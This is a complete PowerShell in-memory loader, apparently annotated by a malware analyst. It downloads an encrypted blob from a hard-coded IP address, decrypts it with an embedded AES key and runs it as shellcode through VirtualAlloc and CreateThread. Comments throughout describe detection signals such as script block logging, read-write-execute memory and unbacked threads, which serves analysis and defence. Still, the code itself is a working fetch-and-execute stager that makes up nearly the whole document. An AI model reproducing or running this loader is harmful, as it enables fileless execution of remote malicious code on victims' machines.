# --- Configuration ---
# AES key (256-bit, 32 bytes)
# Static AES key, base64-encoded inside the script (the string decodes to 32 bytes).
# Analyst note: because key and IV ship with the loader, a captured copy of the
# downloaded blob can be decrypted offline for analysis. The encryption
# presumably serves only to hide the payload from content inspection in transit.
$key = [Convert]::FromBase64String("52WxWGn0T81l1RO8lsuR7U/kJw7Xx0uw26/N7gqBCsw=")
# IV (initialization vector) - 16 bytes, hard-coded like the key.
$iv = [Convert]::FromBase64String("3A92X+ZQOrDKJ2jODNXp3A==")
# URL of the encrypted payload. It is plain HTTP to an IP literal, so the host
# and path are usable as network indicators in proxy, firewall and flow logs.
$url = "http://212.227.245.12/payload.bin"
# Download into memory
# Fetch the encrypted blob from $url as a byte array. DownloadData returns the
# bytes to the caller, and nothing in this script writes them to a file, so
# file-based scanning of the payload is not expected to trigger here.
# Detection: an outbound HTTP request made by a PowerShell host process to a
# raw IP address; PowerShell Script Block Logging (event ID 4104) records the
# script text, including the URL.
$webclient = New-Object System.Net.WebClient
$encrypted = $webclient.DownloadData($url)
# AES decryption
# Decrypt the downloaded blob with AES in CBC mode using the embedded key and IV.
$aes = [System.Security.Cryptography.AesManaged]::Create()
$aes.Mode = [System.Security.Cryptography.CipherMode]::CBC
# PaddingMode None: no padding is stripped, so the ciphertext length presumably
# has to be a multiple of the 16-byte block size and any trailing pad bytes
# stay in $plaintext. Keep this in mind when decrypting a captured sample offline.
$aes.Padding = [System.Security.Cryptography.PaddingMode]::None
$aes.Key = $key
$aes.IV = $iv
$decryptor = $aes.CreateDecryptor()
# One-shot decryption of the whole buffer; $plaintext holds the decrypted
# payload bytes, in managed memory only.
$plaintext = $decryptor.TransformFinalBlock($encrypted, 0, $encrypted.Length)
# Executable memory allocation
# Declare a P/Invoke wrapper for kernel32!VirtualAlloc through Add-Type.
# Detection: Add-Type compiles C# at run time. On Windows PowerShell this
# typically shows up as a csc.exe child process and temporary build files,
# and the member definition itself appears in script block logs.
$VirtualAlloc = Add-Type -MemberDefinition @"
[DllImport("kernel32")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, UInt32 dwSize, UInt32 flAllocationType, UInt32 flProtect);
"@ -Name "Win32" -Namespace "PInvoke" -PassThru
# Allocate a region the size of the decrypted payload.
# 0x1000 -bor 0x2000 = MEM_COMMIT | MEM_RESERVE; 0x40 = PAGE_EXECUTE_READWRITE.
# Detection: a private read-write-execute region inside a PowerShell process
# is a strong memory-scanning and EDR signal.
$exec = $VirtualAlloc::VirtualAlloc(0, $plaintext.Length, 0x1000 -bor 0x2000, 0x40)
# Copy the decrypted bytes from the managed array into the allocated region.
[System.Runtime.InteropServices.Marshal]::Copy($plaintext, 0, $exec, $plaintext.Length)
# Execution in a thread
# Declare a P/Invoke wrapper for kernel32!CreateThread through a second Add-Type call.
$CreateThread = Add-Type -MemberDefinition @"
[DllImport("kernel32")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, UInt32 dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, UInt32 dwCreationFlags, out UInt32 lpThreadId);
"@ -Name "Threading" -Namespace "PInvoke" -PassThru
# Start a thread in the current process whose start address is the allocated
# region ($exec). The returned handle is discarded.
# Detection: a thread whose start address lies in private memory not backed by
# any module on disk is a common EDR and memory-forensics indicator.
$null = $CreateThread::CreateThread(0, 0, $exec, 0, 0, [ref]0)
# Idle loop that keeps the script, and therefore the host process, from exiting
# while the new thread runs. For triage this means a long-lived PowerShell
# process that wakes every 10 seconds and does nothing else.
while ($true) { Start-Sleep -Seconds 10 }